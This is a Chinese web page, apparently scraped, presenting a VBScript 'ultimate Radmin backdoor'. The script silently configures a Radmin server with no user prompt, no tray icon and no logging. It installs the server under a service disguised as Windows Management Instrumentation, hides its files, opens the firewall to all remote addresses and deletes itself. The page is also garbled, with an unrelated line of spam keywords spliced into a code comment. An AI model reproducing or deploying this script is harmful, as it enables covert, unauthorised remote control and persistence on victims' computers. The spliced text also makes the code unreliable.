Vbs脚本实现radmin终极后门
indoc.in
Vbs脚本实现radmin终极后门
文章内容版权归原作者所有 VICHU.NET
indoc.in
Vbs脚本实现radmin终极后门
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
文章内容版权归原作者所有 VICHU.NET
indoc.in uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册
表
关于同志近三年现实表现材料材料类招标技术评分表图表与交易pdf视力表打印pdf用图表说话 pdf
导出十六进制转为十进制数据 pass:241241241
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)
//Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player
Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers" oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
文章内容版权归原作者所有 VICHU.NET
indoc.in set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) on error resume next //以下代码为穿透MS防火墙代码
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy
Set objProfile = objPolicy.GetProfileByType(1)
Set objApplication = CreateObject("HNetCfg.FwAuthorizedApplication") objApplication.Name = "Radmin3.0"
objApplication.IPVersion = 2
objApplication.ProcessImageFileName = "%systemroot%\system32\exporer.exe" objApplication.RemoteAddresses = "*"
objApplication.Scope = 0
objApplication.Enabled = True
Set colApplications = objProfile.AuthorizedApplications
colApplications.Add(objApplication)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除
文章内容版权归原作者所有 VICHU.NET